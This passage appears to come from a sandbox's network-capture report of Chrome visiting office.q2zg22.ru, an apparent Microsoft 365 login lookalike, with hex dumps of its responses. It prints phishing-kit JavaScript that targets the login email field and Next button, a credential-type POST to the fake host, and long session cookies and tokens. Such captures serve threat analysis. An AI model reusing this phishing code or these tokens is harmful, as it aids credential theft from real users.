buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-hE7W-3HlJa9owQFnQJrRENYP0J9Z8A-K4WnZMGz7A5QqO0kXsumO3i8krFA5k1OOPVOxoHJmIILqI1PwJRpWBA8-0mMatTVn8txshoM21rkgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6sTAqDqt7ElFdN1sJSaDq_ggXMYVMb3uFYjIUVq62UeBPW3IB1LLdQHLQLLWtDHFMCnGz_YASr9t1IZ44yG-lHE2RWEbLOxEiDD7CCS16c7IvvS0q5msftUfTo962NYUj6qggkeRtHO1iFZB-mBEoCFjaDe7d9mg2e5R4XwYOGIgAA; esctx-yQ0qBjjSemE=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-iwnOVAzk-mItPYr1eQ-sYWbmhyqBBdm4z6h7jGV3ZTXukH7TxUtzWNjtL_t73Uz9IBQF2UFqfSEiaPZFY9iL4PQjdyE08trjoIqH9KdicIyP1dGJxUIK_srG1mb_8kyCjl8feyTl_S4jJh_EKFvwBSAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:18:26 UTC650INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:26 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lmQOez1RoMla8XEjOI3MpwpzJ5htk8smuKMD0ORtQeC1uJbYPRyHhP1vX%2F15mZcA46jPDSkLzCCslxfi6JJ54k%2FFE34TAobF4%2FDsTy6YyKJyKy3H%2B%2FqWp6bFF7c09KwZ4L%2BA"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7aedfdfb0ca-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:26 UTC719INData Raw: 33 32 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 70 28 29 7b 0a 20 20 76 61 72 20 65 6d 61 69 6c 49 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 30 31 31 36 22 29 3b 0a 20 20 76 61 72 20 6e 65 78 74 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 64 53 49 42 75 74 74 6f 6e 39 22 29 3b 0a 20 20 76 61 72 20 71 75 65 72 79 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 69 66 20 28 2f 23 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 0a 20 20 76 61 72 20 72 65 73 20 3d 20 71 75 65 72 79 2e 73 70 6c 69 74 28 22 23 22 29 3b 0a 20 20 76 61 72 20 64 61 74 61 31 20 3d 20 72 65 73 5b 30 5d 3b
                                                                                                                          Data Ascii: 326function lp(){ var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; if (/#/.test(window.location.href)){ var res = query.split("#"); var data1 = res[0];
                                                                                                                          2024-02-02 19:18:26 UTC94INData Raw: 20 20 20 20 7d 0a 20 20 7d 0a 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 20 20 7d 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 0a 0d 0a
                                                                                                                          Data Ascii: } } setTimeout(function(){lp();}, 500); } setTimeout(function(){lp();}, 500);
                                                                                                                          2024-02-02 19:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          88192.168.2.1649827172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:26 UTC3744OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-hE7W-3HlJa9owQFnQJrRENYP0J9Z8A-K4WnZMGz7A5QqO0kXsumO3i8krFA5k1OOPVOxoHJmIILqI1PwJRpWBA8-0mMatTVn8txshoM21rkgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6sTAqDqt7ElFdN1sJSaDq_ggXMYVMb3uFYjIUVq62UeBPW3IB1LLdQHLQLLWtDHFMCnGz_YASr9t1IZ44yG-lHE2RWEbLOxEiDD7CCS16c7IvvS0q5msftUfTo962NYUj6qggkeRtHO1iFZB-mBEoCFjaDe7d9mg2e5R4XwYOGIgAA; esctx-yQ0qBjjSemE=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-iwnOVAzk-mItPYr1eQ-sYWbmhyqBBdm4z6h7jGV3ZTXukH7TxUtzWNjtL_t73Uz9IBQF2UFqfSEiaPZFY9iL4PQjdyE08trjoIqH9KdicIyP1dGJxUIK_srG1mb_8kyCjl8feyTl_S4jJh_EKFvwBSAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:18:26 UTC646INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:26 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kSIZPFc8h%2BAs7k034NFB4y0exxpOZ9ycmPM33XvkoUooU8qXN4eUBdtjuox2bFjvkZRODiyhI8Z0gxmqbmBqoIS%2FYIbqzUXxNW5a7Hg45%2BE8ky4usvnAMqhP1bJEU6Y7%2Feza"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7aedfc56785-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          89192.168.2.1649828104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:26 UTC2491OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; uaid=8513f9b5312d44168775f3619e83fea6; MSPRequ=id=N&lt=1706901506&co=0
                                                                                                                          2024-02-02 19:18:27 UTC1156INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:27 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Mon, 30 Jan 2034 19:18:27 GMT
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF00010F46 V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: uaid=e42e0277610a4fbd9b38c0bae611b9f4; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901507&co=1; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Request-Id: 1d8d9aca-5bfe-4abb-b86a-7d4f004500fa
                                                                                                                          X-Ms-Route-Info: C104_SN1
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k2YD0uV%2BJBPUXAxFWvT2sINiJoHd%2BGQlgQ%2F%2BXyVA7V5HWfk2i9fno2b91SU78G876jrp8WUFZhUwavf736ODyCEiz45TA1cRC2CdpWOKDcq2CpCyQHoUgh2JgaQT6eSRmZk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7b39aaf7be2-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:27 UTC213INData Raw: 39 31 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 6e 5b 65 5d 3d 74 5b 65 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 73 3d 65 5b 69 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 69 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 73 2c 73 2e 65 78 70 6f 72 74 73
                                                                                                                          Data Ascii: 919<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.exports
                                                                                                                          2024-02-02 19:18:27 UTC1369INData Raw: 2c 74 29 2c 73 2e 6c 6f 61 64 65 64 3d 21 30 2c 73 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 6e 2c 74 2e 63 3d 65 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 67 5b 63 5d 2c 65 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 65 3c 69 3b 2b 2b 65 29 69 66 28 74 5b 65 5d 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2b 22 3d 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 69 3d 30 2c 73 3d 65 2e 6c 65 6e 67 74 68
                                                                                                                          Data Ascii: ,t),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.length
                                                                                                                          2024-02-02 19:18:27 UTC754INData Raw: 74 2c 65 29 7d 63 61 74 63 68 28 6f 29 7b 74 2e 65 72 72 6f 72 3d 6f 2e 6d 65 73 73 61 67 65 7d 6e 26 26 6c 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 6e 29 7d 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2c 63 3d 22 70 72 6f 64 22 2c 70 3d 22 22 2c 66 3d 22 22 2c 64 3d 7b 4e 6f 6e 65 3a 30 2c 53 69 67 6e 65 64 49 6e 54 6f 52 50 3a 31 2c 53 69 67 6e 65 64 49 6e 54 6f 49 44 50 3a 32 2c 52 65 6d 65 6d 62 65 72 65 64 3a 33 7d 2c 75 3d 7b 4e 6f 6e 65 3a 30 2c 49 73 57 69 6e 64 6f 77 73 53 73 6f 3a 31 7d 2c 67 3d 7b 64 65 76 3a 5b 70 2c 66 5d 2c 22 69 6e 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 5d 2c 70 72 6f 64 3a 5b 22 68 74 74 70 73
                                                                                                                          Data Ascii: t,e)}catch(o){t.error=o.message}n&&l.parent.postMessage(JSON.stringify(t),n)}var l=window,c="prod",p="",f="",d={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},g={dev:[p,f],"int":["https://login.windows-ppe.net"],prod:["https
                                                                                                                          2024-02-02 19:18:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          90192.168.2.1649829172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:28 UTC4217OUTPOST /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 2082
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          hpgrequestid: 27d1ec6b-fca3-4a42-8230-27a4915bca00
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          client-request-id: a2d3a705-3719-4180-a89a-d819ae49ee07
                                                                                                                          canary: PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-mniuDvN1Z3-FqBNXXinACG9k98DGV3wUuGX58EAmGGG182-5ai5HMB1bdujYGeIAnoQYQd7zD8EXlgwTH-ionaWuxyBUgHQnk6sm8VKxVu6qh9bYDb92hVGDTeYuL8HI5_C_smFr-B0hQBKU68ApkpEWEj-C8gRxd0lq24D2W1xG0AlRowCZYKrF3jXldQcPogFJKecaJ6CPKzNIPqBjkiAA
                                                                                                                          Content-type: application/json; charset=UTF-8
                                                                                                                          hpgid: 1104
                                                                                                                          Accept: application/json
                                                                                                                          hpgact: 1800
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA; 